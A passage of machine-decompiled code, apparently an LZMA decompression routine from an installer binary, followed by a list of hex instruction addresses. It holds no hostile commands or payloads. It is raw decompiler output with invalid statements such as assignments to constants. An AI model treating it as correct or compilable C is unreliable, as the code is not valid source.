												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406d4b
0x00406d4b
0x00406d4f
0x00406d5c
0x00406d66
0x00000000
0x00406d51
0x00406d51
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d95
0x00406d98
0x00406d9f
0x00406da4
0x00406c85
0x00406c88
0x00406ffa
0x00406ffa
0x00406ffa
0x00406ffd
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x0040704b
0x0040704f
0x004071fe
0x00407214
0x0040721c
0x00407223
0x00407225
0x0040722c
0x00407230
0x00407230
0x0040705b
0x00407062
0x0040706a
0x0040706d
0x00407070
0x00407070
0x00407076
0x00407076
0x00406812
0x00406812
0x00406812
0x0040681b
0x00000000
0x00000000
0x00406821
0x00000000
0x0040682c
0x00000000
0x00000000
0x00406835
0x00406838
0x0040683b
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x0040688b
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x00000000
0x0040717d
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00406ffa
0x00406ffa
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x00000000
0x0040718c
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040698e
0x00406990
0x00406993
0x00406a04
0x00406a07
0x00406a0a
0x00406a11
0x00406a1b
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406995
0x00406999
0x0040699c
0x0040699e
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069b6
0x004069ba
0x004069c1
0x004069c4
0x004069cb
0x004069cf
0x004069d7
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069db
0x004069de
0x004069fc
0x004069fe
0x00000000
0x004069e0
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069eb
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00000000
0x004069f7
0x00000000
0x00406c2d
0x00406c31
0x00406c4f
0x00406c52
0x00406c59
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6a
0x00406c71
0x00406c72
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
